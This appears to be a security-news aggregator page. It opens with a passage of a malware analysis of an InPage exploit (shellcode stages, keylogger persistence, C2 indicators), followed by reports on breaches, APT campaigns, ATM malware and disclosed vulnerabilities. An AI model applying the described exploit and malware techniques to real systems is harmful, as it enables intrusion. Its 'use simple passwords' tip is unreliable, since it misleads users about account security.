Between the various phishing campaigns relying on this exploit, one particular attack attracted our attention. The targets of this attack were special, since they were banks in Asia and Africa. The payload and C&C servers are also different from the recent attacks we’ve observed, meaning there are probably several actors utilizing this zero-day exploit at the moment.

Technical details


Spearphishing e-mail with several malicious attachments. The .inp contains the zero-day exploit

In their attacks, the threat actors often use more than one malicious document. During spearphishing, the actors attached InPage files as well as .rtfs and .docs with old popular exploits.

Looking through all the related documents we could find, we counted several different versions of keyloggers and backdoors written mostly in Visual C++, Delphi and Visual Basic.

One such keylogger we analysed (MD5 hash: 18a5194a4254cefe8644d191cb96da21) was written in Visual C++. After gaining control, the module decodes several internal strings. One of them is the C2 domain name visitorzilla[.]com. This backdoor maintains persistence by creating “C:\Documents and Settings\<USER>\Start Menu\Programs\Startup\DataABackup.lnk“. Similar to the other campaign modules, it uses SetWindowsHook() with WH_KEYBOARD_LL hook to gather keystrokes. To gather keystroke data, the module uses two files on disk: C:\Documents and Settings\<USER>\Application Data\DataBackup\sed.ic and me.ic (located in the same directory).

Inside weaponized documents

InPage uses its own proprietary file format that is based on the Microsoft Compound File Format. The parser in the software’s main module “inpage.exe” contains a vulnerability when parsing certain fields. By carefully setting such a field in the document, an attacker can control the instruction flow and achieve code execution.

The shellcode has three main parts:

Pattern searcher (so-called “egg hunter”) before the decoder,
The pattern searcher looks through all of the virtual memory space attempting to find the pattern “68726872”. Once the searcher identifies this pattern it starts the next stage of exploit – the decoder.


Shellcode decryptor

The small decoder obtains the instruction pointer and uses FLDPI + FSTENV instructions (an old and uncommon technique). The decoder is using an arithmetic NOT followed by a XOR 0xAC operation to decrypt the next stage.

Next, the downloader fetches a remote payload using InternetReadFile() and runs it using the WinExec() function in the %userprofile% directory. This functionality is very common and we’ve seen it with many other exploits. It’s the choice of vulnerable software that is interesting in this case and, for sure, the appearance of an exploit for software that is popular mostly in India and Pakistan.

The final payload is a Trojan written in Visual Basic 6. It defines a hook using the SetWindowsHook() function with the WH_MSGFILTER parameter. It communicates with its C2 server at on port 8080.

During the initial session the C2 server sends “Pass” and host replies with “Auth<username>@<hostname>\#/<OS version>\#/<IP address>\#/-” In addition to b4invite[.]com this same Trojan was also spread using a configuration with the C2 server relaybg[.]com.


So far, victims of these attacks have been observed in Myanmar, Sri-Lanka and Uganda. The sector for the victims include both financial and governmental institutions.


By all appearances, this newly discovered exploit has been in the wild for several years. In some way, it reminds us of other similar exploits for Hangul Word Processor, another language/region-specific text processing suite used almost exclusively in South Korea. HWP has been plagued by several exploits in the past, which have been used by various threat groups to attack Korean interests.

Despite our attempts, we haven’t been able to get in touch with the InPage developers. By comparison, the Hangul developers have been consistently patching vulnerabilities and publishing new variants that fix these problems. The best defense against exploits is always a multi-layered approach to security. Make sure you have an internet security suite capable of catching exploits generically, such as Kaspersky Internet Security. Installing the Microsoft EMET tool can also help, as well as running the most recent version of Windows (10). Finally, default deny policies, also known as whitelisting can mitigate many such attacks.

The Australian Signals Directorate Top35 list of mitigation strategies shows us that at least 85% of intrusions could have been mitigated by following the top four mitigation strategies together. These are: application whitelisting, updating applications, updating operating systems and restricting administrative privileges. Kaspersky Lab has technological solutions to cover the first three of these (i.e. all the technology-based strategies) as well as most of the others from Top35 ASD’s list.

Kaspersky Lab detects this exploit as HEUR:Exploit.Win32.Generic.

More information about this exploit, associated campaigns and attacks is available to customers of Kaspersky Intelligence Services. Contact:

Indicators of compromise:


f00e20ec50545106dc012b5f077954ae – rtf
729194d71ed65dd1fe9462c212c32159 – inp

C&Cs used in the samples dropped by the weaponized InPage documents:

Aliasway[.]com <- SINKHOLED by Kaspersky Lab

Your Headphones Can Spy On You — Even If You Have Disabled Microphone
24.11.2016 thehackernews Hacking
Have you considered the possibility that someone could be watching you through your webcam? Or Listening to all your conversations through your laptop’s microphone?
Even a bit of thought about this probability could make you feel incredibly creepy.
But most people think that they have a solution to these major issues i.e. simply covering their laptop’s webcam and microphone with tape, just like Facebook CEO Mark Zuckerberg and FBI Director James Comey.
But it's 2016, and a piece of tape won't help you, as a new experiment has proved that how easily hackers can turn your headphones into a microphone to spy on all your conversations in the background without your knowledge.
A group of Israeli security researchers at Ben Gurion University have created a proof-of-concept code (malware) that converts typical headphones into microphones and then use them to record all your conversations in the room just like a fully-featured spying device.
Speake(a)r Malware Weaponizes Headphones and Speakers
Using headphones as microphones is a decade-old technique. There are many videos available on YouTube, which show that earbuds can function as microphones in a pinch.
But what the researchers managed to do is switching an output channel of the audio card on your laptop — running either Windows or Mac OS — to an input signal and then recording the sound without any dedicated microphone channel from as far as 20 feet away.
Dubbed "Speake(a)r," the malicious code (malware) is disturbingly able to hijack a computer to record audio even when its microphone is disabled or completely disconnected from the computer.
"People don’t think about this privacy vulnerability," says lead researcher Mordechai Guri told Wired. "Even if you remove your computer’s microphone, if you use headphones you can be recorded."
Speake(a)r actually utilizes the existing headphones to capture vibrations in the air, converts them to electromagnetic signals, alters the internal functions of audio jacks, and then flips input jacks (used by microphones) to output jacks (used for speakers and headphones).
This allows a hacker to record audio, though at a lower quality, from computers with disabled or no microphone or from computers of a paranoid user, who has intentionally removed any existing audio components.
But What made this Hack Possible?
Thanks to a little-known feature of Realtek audio codec chips that actually "retask" the computer's output channel as an input channel silently.

This makes it possible for the researchers' malware to record audio even when the earbuds is connected into an output-only jack and do not even have a microphone channel on their plug.
What's even worse? Since RealTek chips are being used on the majority of systems these days, the Speake(a)r attack works on practically any computer, running Windows or MacOS, and most laptops, as well, leaving most computers vulnerable to such attacks.
"This is the real vulnerability," said Guri. "It’s what makes almost every computer today vulnerable to this type of attack."
The feature of RealTek audio codec chips is truly dangerous, as it can not be easily fixed. The only way to deal with this issue is to redesign and replace the chip in current as well as future computers, which is impractical.
Security researchers also published a YouTube video which shows the Speake(a)r eavesdropping attack in work.
For more detailed and technical explanation of the Speake(a)r attack, you can head on to the research paper [PDF] titled "Speake(a)r: Turn Speakers to Microphones for Fun and Profit."

Watch out! This iPhone-freezing video will CRASH any iPhone!
24.11.2016 securityaffairs Apple

It has happened again, most of the Apple devices crashes when the owner plays this iPhone-freezing video. Be careful when clicking on suspicious links.
A new bug in iPhone is threatening Apple users, most of the Apple devices crashes when the owner plays a video. An iPhone-freezing video is circulating online, when users play it in the Safari browser the iPhones slow down until they stop working altogether.

The iPhone-freezing video was first discovered by EverythingApplePro, it is a short .mp4 clip of someone standing by a bed with the words “Honey” written across the screen.

“After playing the clip, affected iPhones will remain usable for a couple of minutes before growing more sluggish and eventually crashing altogether. ” reads a post published by The Telegraph.

iPhone-freezing video

At the time I was writing there is no information regarding the nature of the bug. Users observed that the iPhone crashes even if only a part of the iPhone-freezing video is played.

The clip causes the crash of all the versions of iOS back to iOS 5. The experts noticed a different behavior only on iOS 10.2 beta 3, with this specific version the vision of the video causes the phone to display the spinning wheel that indicates powering off.
In the past, other similar bugs were able to cause the crash/restart of the Apple devices, there was a problem receiving a certain text message, changing the iphone settings, or simply clicking on the link on the iPhone, iPad or even Macs.

Below the PoC video for the iPhone-freezing video:

Waiting for a patch for your iPhone, be careful when clicking on suspicious or unsolicited links.
If you watch the video by mistake and your iPhone freezes up, you can solve the problem with a hard reboot.
“To do this on any iPhone model other than the iPhone 7, press and hold the home and power buttons at the same time for at least 10 seconds until the Apple logo appears. On an iPhone 7 you can hard reset by holding the power and volume decrease buttons.” continues The Telegraph.

“After the Apple logo appears, release the buttons and your iPhone should restart normally.”

Registral Function of the State Mexico (FREM) hacked. Shad0wS3C is back

23.11.2016 securityaffairs Hacking

The hacker group Shad0wS3C is back and hacked the Institute of the Registral Function of the State Mexico (FREM), it leaked the database.
Shad0wS3C is Back and hacked the Institute of the Registral Function of the State Mexico (FREM) and leaked a dump of its database.

The hacker leaked the database at the following URL


The archive includes three files containing personal information of the users, including passport info and other sensitive details.

In the past, Shad0wS3C was an hacktivist group, it seems to have changed its mission and started hacking without any specific political motivation.

Its member Gh0s7, told me that the FREM data breach is just an anticipation of future attacks.

“This leak is just a simple demonstration for our future attacks. We will be leaking more gov and private corps.” Gh0s7 told me.

The group launched a targeted attack, the first of a new wave that aims to hit government servers and corporations worldwide.

The hackers have a list of targets composed of gov and private servers to hack.

This is their “black list.”

Hackers did not reveal details of the data breach, they simply told me to have used a “private exploit.”

The last time hack in order of time made by Shad0wS3C is the Paraguay’s Secretary of National Emergency (SNE) data breach occurred in August. The hackers leaked online a dump from a PostgreSQL database also in this case.

Tropic Trooper APT targets Taiwanese Government and companies in the energy sector
23.11.2016 securityaffairs APT

The Tropic Trooper APT continues to target Asia, this time government Taiwanese organizations and companies in the energy sector.
The Tropic Trooper APT that has been active at least since 2012, it was first spotted last year by security experts at Trend Micro when it targeted government ministries and heavy industries in Taiwan and the military in the Philippines.

Now researchers from Palo Alto Networks targeted the secretary general of Taiwan’s Executive Yuan and a fossil fuel provider with a strain of malware called Yahoyah. The attackers leverage an exploit for the CVE 2012-0158 vulnerability, the same flaw was exploited by many other APT groups, including Lotus Blossom, NetTraveller, and The Four Element Sword ATP.

Palo Alto Networks discovered that the group used Poison Ivy for his campaigns, a circumstance that emerged in the analysis of TrendMicro.

“The attacks in this case are associated with a campaign called Tropic Trooper, which has been active since at least 2011 and is known for heavily targeting Taiwan. One of the attacks used their known Yahoyah malware, but the other attack deployed the widely available Poison Ivy RAT.” state the report published by Palo Alto Networks. “This confirms the actors are using Poison Ivy as part of their toolkit, something speculated in the original Trend Micro report but not confirmed by them. Further analysis uncovered a handful of ties indicating the actors may also be using the PCShare malware family, which has not been previously tied to the group.”

The hackers launched a spear-phishing campaign to trick victims into opening specially crafted decoy documents. The Excel file sent to the Executive Yuan purports to come from a staff member at the Democratic Progressive Party, the document is related to political issues.

Tropic Trooper APT targets Taiwanese Government

After infecting the target machine, the malware displays to the victim a clean document that contains the content of interest.

“All of the text uses Traditional Chinese, in contrast to Simplified Chinese, which is the official written language of the People’s Republic of China. Traditional Chinese is used in Taiwan, Hong Kong, Macau, and many overseas Chinese communities. The overarching theme of the spreadsheet is documenting protestor activity and/or progressive reform attempts in progress across Taiwan and the tone of the spreadsheet suggests it was compiled by progressive supporters.” continues the report.

If you are interested in more info on Tropic Trooper APT, including IoC for its malware give a look at the report.

NTP DoS Exploit Released — Update Your Servers to Patch 10 Flaws
23.11.2016 thehackernews Attack

A proof-of-concept (PoC) exploit for a critical vulnerability in the Network Time Protocol daemon (ntpd) has been publically released that could allow anyone to crash a server with just a single maliciously crafted packet.
The vulnerability has been patched by the Network Time Foundation with the release of NTP 4.2.8p9, which includes a total of 40 security patches, bug fixes, and improvements.
The NTP daemon is used in almost every device that needs to synchronize time on computer clocks. NTP got the most attention in late 2014 and 2015 when hackers used it to launch highly amplified DDoS attacks against services.
The flaw which affects's nptd versions prior to 4.2.8p9, but not including ntp-4.3.94, has been discovered by security researcher Magnus Stubman, who privately disclosed it to the Network Time Foundation on June 24.
A patch for the vulnerability was developed and sent to Stubman on 29th September and just two days later, the researcher acknowledged that it mitigated the issue. And now he went with the public disclosure.
"The vulnerability allows unauthenticated users to crash ntpd with a single malformed UDP packet, which causes a null pointer dereference," Stubman wrote in an advisory published Monday.
Stubman also released a PoC exploit that can crash the NTP daemon and creates a denial-of-service (DoS) condition. The issue only affects Windows.
Besides Stubman's high severity vulnerability, the latest NTP update also addresses two medium severity bugs, two medium-low severity, and five low-severity security issues; 28 bug fixes, and contains other improvements over 4.2.8p8.
Another major bug is a trap-crash vulnerability reported by Cisco's Matthew Van Gundy.
"If trap service has been explicitly enabled, an attacker can send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service," reads the advisory.
CERT at the Software Engineering Institute at Carnegie Mellon University has also released the full list of the vulnerabilities in NTP and fixes. It also listed some vendors that implement NTP and could be affected by the bugs.
Since the exploit for the severe bug is available to the public, administrators are strongly recommended to patch their NTP implementations as soon as possible.
In the past, we have seen hackers abusing the NTP servers by sending small spoofed UDP packets to the vulnerable server that requests a significant amount of data (megabytes worth of traffic) to be sent to the DDoS's target IP Address.
Above 400 Gbps NTP amplification DDoS Attack was carried out against content-delivery and anti-DDoS protection firm CloudFlare, and volumetric DDoS attacks exceeding 100 Gbps against popular Gaming services, including League of Legends,, and from Blizzard in 2014.
In a study conducted by Arbor Networks in late 2013, the researchers illustrated the effectiveness of NTP amplification attacks that are massive and efficient to take any large server offline because they reflect 1,000 times the size of the initial query back to the target.

Credit cards stolen from Madison Square Garden venues in the last year
23.11.2016 thehackernews Crime

Madison Square Garden Company informed users that their payment card data may have been stolen by cybercriminals
Yesterday, the Madison Square Garden Company notified users that their payment card data may have been stolen by cybercriminals. According to the company, crooks have used a PoS malware on its payment processing system and have stolen payment card data used at the Madison Square Garden in the last year.

Hackers have stolen payment card data, including credit card numbers, cardholder names, expiration dates, and internal verification codes.

The Madison Square Garden company disclosed the security breach and clarified that only customers who physically used their card for food, drink or merchandise payments at its venues. According to the organization, online ticket and merchandise purchases did not expose customers.

MSG disclosed information on the attack neither information on the number of affected users.

The affected cards have been used between 9 November 2015 and 24 October 2016 at several Madison Square Garden venues, including the Theater at Madison Square Garden, Radio City Music Hall, Beacon Theater, and Chicago Theater.


Below the official statement released by the Madison Square Garden

“Findings from the investigation show external unauthorised access to MSG’s payment processing system and the installation of a program that looked for payment card data as that data was being routed through the system for authorisation,” reads the statement.

“Data contained in the magnetic stripe on the back of payment cards swiped in person to purchase merchandise and food and beverage items at Madison Square Garden, the Theater at Madison Square Garden, Radio City Music Hall, Beacon Theater, and Chicago Theater between November 9, 2015 and October 24, 2016 may have been affected, including credit card numbers, cardholder names, expiration dates and internal verification codes. Not all cards used during this time frame were affected. This incident did not involve cards used on MSG websites, at the venues’ Box Offices, or on Ticketmaster.”

WordPress Plugins could expose online shoppers on Black Friday and Cyber Monday

23.11.2016 securityaffairs Security

Black Friday and Cyber Monday are upon us, Checkmarx published a report analyzing the security of some of the top WordPress plugins.
The Black Friday and the Cyber Monday are upon us and security experts from Checkmarx are questioning the security of some of the top WordPress e-commerce plugins that are currently used in more than 100,000 commercial websites.

Checkmarx analyzed the top 12 WordPress e-commerce plugins discovering that four of them are affected by severe vulnerabilities, including reflected cross-site scripting, SQL injection, and file manipulation flaws.

“Out of the 12 plugins we are scanning we have detected high-risk vulnerabilities in at least four of them. One plugin contained three vulnerabilities while the other three each contained one. Of the found vulnerabilities so far, Reflected XSS was found on three plugins, an SQL injection was found on one plugin, Second Order SQL Injection found on one plugin with File Manipulation also being detected on one plugin.” reported the analysis published by Checkmarx. “Of the vulnerabilities that we have detected so far, if they were exploited, the users of over 135,000 websites could find their personal data threatened by malicious parties or cyber criminals.”

The document includes an explanation for most popular flaws affecting WordPress based websites such as reflected cross-site scripting, SQL injection, and file manipulation flaws.

The report doesn’t refer specific e-commerce plugins used by WordPress sites and doesn’t provide information about the commercial platform using it.

Businesses powering e-commerce platform based on WordPress should download plugins only from trusted sources (

The researchers also suggest scanning the source code of the plugins with a static source code analysis solutions to discover if they are affected by the above vulnerabilities.

Patch management assumes a crucial importance to secure e-commerce websites running on the WordPress CMS, administrators have to constantly maintain plugins up to date.

The report provides useful suggestions to cyber Monday and black Friday shoppers such as:

Use simple passwords.
Never use passwords on more than one site or platform.
Enable two-factor authentication.
Check the validity of the SSL Certificate exposed by the e-commerce platform.
Be aware phishing emails.

Armed Forces recruitment website hacked, visitors redirected to China
23.11.2016 securityaffairs Hacking

Canada Armed Forces recruitment website was taken down after it was hacked and would-be recruits are redirected to a Chinese government page.
The Canadian Armed Forces recruitment website was hacked last week, visitors have been redirected to the Chinese government’s main page instead of the legitimate website.

According to CTV television, anyone trying to sign up for Canada’s Armed Forces on the page was redirected to the site instead. The armed forces quickly took down the page.

“The recruiting web page for the Canadian Armed Forces appears to have been hacked Thursday, redirecting users to an official Chinese state page.” reported CBC News.

“Users visiting, which is the main landing page for would-be recruits, were instead getting a page full of information and statements about Chinese government ministers, and their activities, in that country. The site now shows an error message instead”

The Canadia Armed Force promptly took the recruiting page off-line.

canada Armed Forces recruitment

Two government sources told CBC News that the recruiting website was hosted externally by a private-sector provider.

One of the officials who has spoken with the media outlet revealed that servers at the Department of National Defence were not compromised in the attack.

“This is a serious matter,” Public Safety Minister Ralph Goodale told reporters Thursday after question period. “We don’t want to jump to conclusions, but when something of this nature happens … we treat it with real gravity, and we’ll investigate it. That process is underway right now.”

The news of the hack was confirmed by the Defense ministry spokeswoman Ashley Lemire, who added that there is no information regarding the responsible.

Canadian authorities have long complained about incursions of foreign hackers into government computer networks.

“In 2014, Canada’s then Conservative government took the unusual step of singling out Chinese-based hackers for attacking a key computer network and lodged a protest with Beijing.” reported the Reuters.

ESET Crysis decryptor to rescue files encrypted by the Crysis ransomware
23.11.2016 securityaffairs Virus

ESET security firm has included master decryption keys into a decryption tool that allows rescuing the encrypted files without paying the ransom.
Good news for the victims of the Crysis ransomware, ESET security firm has included master decryption keys into a tool that allows rescuing the encrypted files.

The decryption keys for the CrySis ransomware were posted online on the forum by a user known as crss7777 who shared a link to a C header file containing the actual master decryption keys and information on how to utilize them.

“In a surprise move, the master decryption keys for the CrySiS Ransomware have been released early this morning in a post on the forums. At approximately 1 AM EST, a member named crss7777 created a post in the CrySiS support topic at BleepingComputer with a Pastebin link to a C header file containing the actual master decryption keys and information on how to utilize them,” wrote Lawrence Abrams from BleepingComputer.

“These keys have already been used by Kaspersky Labs to update their RakhniDecryptor program so that it can be used to decrypt victim’s files.”

CrySis ransomware Taken from

Lawrence Abrams speculates the user crss7777 could be a member of the development team.

“Though the identity of crss7777 is not currently known, the intimate knowledge they have regarding the structure of the master decryption keys and the fact that they released the keys as a C header file indicates that they may be one of the developers of the CrySiS ransomware,” said Abrams.

“Why the keys were released is also unknown, but it may be due to the increasing pressure by law enforcement on ransomware infections and the developers behind them.”

The CrySis ransomware was first spotted in February by ESET, it has infected systems mostly in Russia, Japan, South and North Korea, and Brazil.

The malware spreads via email attachments with double file extensions or via malicious links embedded in spam emails.

The ransomware is able to encrypt more than 200 file types searching for them on internal and external storage, and network shares, and deleting backup shadow files.

The CrySis ransomware appends the .xtbl extension to the encrypted files, the files are renamed following the following format [filename].id-[id].[email_address].xtbl.

In June the experts observed a peak in the number of infections, likely due to the dead of TeslaCrypt.

Security experts observed that in Australia and New Zealand the Crysis ransomware was targeted businesses exploiting remote desktop connections and compromising routers to re-infect cleaned up computers.

“Crysis (detected by Trend Micro as RANSOM_CRYSIS.A), a ransomware family first detected in February this year, has been spotted targeting businesses in Australia in New Zealand through remote desktop protocol (RDP) brute force attacks.” reported Trend Micro in a blog post.

It is not clear why crooks dropped the decryption keys, likely they tried to ease the pressure of law enforcement that were trying to identify the operators behind the malware.

ESET has included the decryption keys in a free tool, ESET Crysis decryptor, and published instructions to use it.

Nebezpečný virus se maskuje za fotku na Facebooku. Šíří se i v Česku

22.11.2016 Novinky/Bezpečnost Viry
Na pozoru by se měli mít čeští a slovenští uživatelé sociální sítě Facebook. Prostřednictvím ní, respektive skrze chatovací aplikaci Messenger, se začal šířit nebezpečný virus. Jde o nechvalně známého záškodníka Lockyho, který patří do kategorie tzv. vyděračských virů. Před hrozbou varovala antivirová společnost Eset.
Nezvaný návštěvník se maskuje za fotografii. „Ve skutečnosti jde o vektorový grafický soubor, který uživatele po otevření v prohlížeči Google Chrome přesměruje na stránku připomínající YouTube,“ varoval Pavel Matějíček, manažer technické podpory společnosti Eset.

„Na ní ho vyzve, aby si kvůli přehrání videa nainstaloval rozšíření pro tento prohlížeč. Do jeho zařízení se následně nainstaluje škodlivý kód Nemucod, jehož dalším úkolem je stáhnout do infikovaného počítače ransomware Locky,” konstatoval Matějíček.

Patří mezi nejrozšířenější hrozby
Lockyho nasazují počítačoví piráti do oběhu stále častěji. V září se dokonce dostal podle bezpečnostní společnosti Check Point jako první vyděračský virus do Top 3 nejrozšířenějších malwarových rodin, byl zodpovědný za šest procent všech detekovaných útoků po celém světě. 

V případě Lockyho kyberzločinci infikují systém e-mailem s wordovou přílohou, která obsahuje škodlivé makro. Jakmile uživatel soubor otevře, makro spustí skript, který stáhne spustitelný škodlivý soubor, nainstaluje se na počítač oběti a vyhledává soubory, které šifruje. Uživatel potom ani neví, že útok začal právě kliknutím na e-mailovou přílohu.

Kyberzločinci se pak zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod. I proto jim celá řada lidí již výkupné zaplatila.

Výkupné neplatit
Ani po zaplacení výkupného se ale uživatelé ke svým datům nedostanou. Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné.

Z řádků výše je patrné, proč je Locky tak nechvalně proslulý. „Jeho oběťmi nejsou jen běžní uživatelé, ale i firmy,“ konstatoval Matějíček.

Ten zároveň poukázal na to, že se proti tomuto záškodníkovi snaží bojovat i samotný Google, za jehož produkty se vyděračský virus vydává patrně nejčastěji. „Aktuálně společnost Google zablokovala všechna škodlivá rozšíření, která pro svoje šíření tato kampaň využívala. Je však možné, že útočníci brzy vytvoří nové varianty, kterými dokáží tento nebo jiný škodlivý kód šířit i přes sociální sítě,“ doplnil Matějíček.

Hackers Steal Millions From European ATMs Using Malware That Spit Out Cash
22.11.2016 thehackernews Hacking
ATM hackers who long relied on tactics of stealing payment card numbers and online banking credentials to steal millions are now targeting the bank itself to steal cash directly from the machines.
Earlier this year, a gang of cyber criminals infected several ATMs with malware in Taiwan and Thailand that caused the machines to spit out millions in cash, and the gang members then stood in front of the infected ATMs at the appointed hour and collected the money.
Now, the FBI has warned U.S. banks of the potential for similar ATM jackpotting attacks, saying that the agency is "monitoring emerging reports indicating that well-resourced and organized malicious cyber actors have intentions to target the U.S. financial sector."
ATM jackpotting is a technique used to force automated teller machines to spit out cash.
According to Russian cyber security firm Group-IB, cyber crooks have remotely infected ATMs with malware in more than dozen countries across Europe this year, which forces machines to spit out cash.
The world's two largest ATM manufacturers, Diebold Nixdorf and NCR Corp., said they were aware of the ATM attacks and had already been working with their customers to mitigate the threat.
The cyber criminals have been targeting ATMs for at least five years, but the latest hacking campaigns mostly involved small numbers of ATMs due to the fact that hackers required physical access to the machines to collect cash.
Group-IB did not name the banks targeted in the campaign but said the victims were located in Armenia, Bulgaria, Estonia, Georgia, Belarus, Kyrgyzstan, Moldova, Spain, Poland, the Netherlands, Romania, the United Kingdom, Russia, and Malaysia.
Both Diebold Nixdorf and NCR said they had already provided banks with information on how to thwart the attack, Reuters reported.
"We have been working actively with customers, including those who have been impacted, as well as developing proactive security solutions and strategies to help prevent and minimize the impact of these attacks," said Owen Wild, NCR's global marketing director for enterprise fraud and security.
The disclosure of the new campaign comes months after two large ATM hacks, wherein hackers stole $2.5 Million from Taiwan's First Bank and $350,000 from Thailand's state-owned Government Savings Bank.
While Group-IB believes the attacks across Europe were conducted by a single criminal group, dubbed Cobalt, the FBI believes the malicious software used in the attack could be linked to the Russian ATM gang known as Buhtrap, the Wall Street Journal reported.
However, citing the tools and techniques used by both groups, Group-IB believes that Cobalt is linked to Buhtrap, which stole 1.8 Billion rubles ($28 Million) from Russian banks between August 2015 and January 2016.

Oracle acquires DNS provider Dyn for more than $600 Million
22.11.2016 thehackernews IT
Yes, Oracle just bought the DNS provider company that brought down the Internet last month.
Business software vendor Oracle announced on Monday that it is buying cloud-based Internet performance and Domain Name System (DNS) provider Dyn.
Dyn is the same company that was hit by a massive distributed denial of service (DDoS) attack by the Mirai botnet last month which knocked the entire Internet offline for a few hours, crippling some of the world's biggest and most popular websites.
Since the company provides cloud-based DNS service to customers such as Spotify, Netflix, Twitter and Pfizer, the acquisition will help Oracle's cloud customers to optimize their infrastructure costs and performance.
According to the press release, the Dyn acquisition "extends the Oracle cloud computing platform and provides enterprise customers with a one-stop shop for Infrastructure-as-a-Service (IaaS) and Platform-as-a-Service (PaaS)."
"Oracle Cloud customers will have unique access to Internet performance information that will help them optimize infrastructure costs, maximize application and website-driven revenue, and manage risk," said Kyle York, chief strategy officer of Dyn.
The company said Dyn's immensely scalable and global DNS is not just a critical core component but also provides a natural extension to Oracle's cloud computing platform.
So, the deal would help its cloud customers improve access and page-load speeds for their websites using internet performance information.
Oracle did not disclose the acquisition amount it paid for Dyn, but a source close to the deal told Fortune that Oracle paid somewhere between $600 Million and $700 Million to acquire Dyn.
Dan Primack reported that Oracle paid around $600 million for Dyn, though Dyn has yet to respond to a request for comment.
Oracle is far behind Amazon Web Services (AWS), which is the market leader in the infrastructure cloud computing market. The deal would potentially make the company compete with Amazon's AWS and on Microsoft's Azure – Route 53 and Azure DNS.

Michigan State University Data Breach, 400,000 Records Exposed

22.11.2016 securityaffairs Hacking

Hackers attempted to extort Michigan State University after they have breached into its database containing 400,000 records of students and employees.
Crooks hacked the Michigan State University breaching into a database containing 400,000 student and employee records, then tried to monetize the efforts attempted to extort the organization.

Michigan State University reported the data breach occurred on November 13 when an unauthorized party accessed into a server of the organization.

“Michigan State University has confirmed that on Nov. 13 an unauthorized party gained access to a university server containing certain sensitive data.

The database, which contained about 400,000 records, included names, social security numbers and MSU identification numbers of some current and former students and employees. It did not contain passwords or financial, academic, contact or health information.” reported the Michigan State University.

Of those records, 449 were confirmed to be accessed by the unauthorized party. The affected database was taken offline within 24 hours of the unauthorized access.”

The records accessed by the hackers contain personal information of current and former students and employees, including names, social security numbers, MSU identification numbers, and dates of birth.

The MSU Police Department confirmed that is investigating the case with federal law enforcement authorities.

The database includes information as far back as 1970, the Michigan State University highlighted that passwords, financial information, and contact details were not included in the archive.

The university said it took the affected database offline within 24 hours after discovering the breach and it determined that only 449 of the records have been accessed by the hackers.

“At Michigan State University, we are committed to data and privacy protection. Regrettably, we were recently the target of a criminal act in which unauthorized users gained access to our computer and data systems. Information security is a top priority of our university, and we know the frustration this is causing members of our community.” said President Lou Anna K. Simon. “Only 449 records were confirmed to be accessed within the larger database to which unauthorized individuals gained access. However, as a precaution, we will provide credit monitoring and ID theft services for any member of our community who may have been impacted by this criminal act. We also will continue to work diligently in our efforts to protect the integrity of our data systems and improve the security of information that is entrusted to us.”

Representatives from the University told Fox47News that the hackers attempted to extort the organization after breached in their database.

This is the second time that the Michigan State University was hacked this year.

In October, the hacker Mys7erioN told me to have hacked into the Michigan State University.

As proof of the hack, Mys7erioN published on Pastebin the records of the table containing user data, including ‘user,’ including names, logins, phone numbers, emails published and encrypted passwords.

Michigan State University hacked

Mys7erioN was scanning some websites when discovered an SQL injection vulnerability.

In 2012, a hacker leaked 1,500 records from the University and in 2013, the University confirmed that hackers modified employee banking information using stolen credentials. infected toolbar gets stopped in its tracks before it gets started
22.11.2016 securityaffairs Virus

Security experts at Red Canary discovered attackers who were trying to use the Toolbar as a vector to spread malware.
A just-in-time catch by sharp-eyed analysts at Red Canary has thwarted what looks like early stage development and deployment of malicious software delivered via’s toolbar.

The PE (Portable Executeable) delivered by, which is often bundled with Oracle Java installers, is a common browser search toolbar often viewed by users as an annoyance in the best case scenario or an example of a PUP (Potentially Unwanted Program) and malware in the worst case.

From Ask’s own homepage they define what they do as “[We]… provide solutions to help software developers acquire and monetize users. We bring tremendous value to our partners via new revenue streams, increased customer engagement, and ongoing brand promotion.” This by its very definition describes the function of adware.

Red Canary immediately reported their findings to Ask who they later thanked in their swift response in supplying a fix to mitigate the malicious threat.

The CSO at Red Canary, Scott McCammon, outlined the details of their investigation as well as Ask’s response and potential threat surface, stating:

“The impact of this event was minimized by the combination of Red Canary’s ability to identify behaviors not easily detected by software alone, our customers’ ability to respond, and the software vendor’s diligence with respect to mitigation. But we cannot allow the impact of one event to mask the substantial risk that this class of attack exposes. A software supply chain attack targeting a vendor with this type of reach could easily infect thousands or perhaps millions of endpoints worldwide.”

Once the compromised toolbar was installed, the included dropper called additional malicious programs such as banking Trojans and other online fraud warez.

As the secondary payloads varied across the dozen or so compromised machines, the security researchers concluded that the malware was in early stages of development with the malicious actors experimenting with which kind of malware the exploit would ultimately deliver.

The CSO stated that there was no evidence to suggest that any one type of malware had been identified at this stage to be propagated in widespread across the board fashion and that what was being delivered was described as “Off the shelf.” toolbar-malware

Although no explanation has yet been offered by Ask as to the root cause of the compromise, Red Canary only spotted the anomalies in the toolbar software by human interaction. McCammon stated that automated software processes wouldn’t have been able to intelligently identify the Indicators of Compromise (IoCs) within the code as the software itself passed all of the standard criteria of expected behavior.

In this case the toolbar’s binaries were signed as legitimate by ask, however, the dates and times of the signing were one of the giveaways of the malicious embedded code. The dates and times were noted as being signed mere hours before the discovery, normal lifecycle timescales would mark at least several days normally as software is passed through typical layers of assurance.

The initial .exe spawned an additional .png file which was in itself executing additional code, another red flag which further alerted the fast acting research team at Red Canary.

Lost in Translation, or the Peculiarities of Cybersecurity Tests
22.11.2016 Kaspersky Analysis
In the book The Hitchhiker’s Guide to the Galaxy there’s a character called the Babel fish, which is curiously able to translate into and from any language. Now, in the present-day world, the global cybersecurity industry speaks one language – English; however, sometimes you really do wish there was such a thing as a Babel fish to be able to help customers understand the true meaning of the marketing messages of certain vendors.

Here’s a fresh example.

Earlier this month the independent testing lab AV-Comparatives simultaneously conducted two tests of cybersecurity products using one and the same methodology. The only differences between the two tests were (i) in the line-ups of participating products in each; and (ii) in the names of the tests themselves: Comparative Test of Business Security Products and Comparison of ‘Next-Generation’ Security Products.

Strange? A little. So let me tell you what’s afoot here: why these practically identical tests were conducted at the same time.

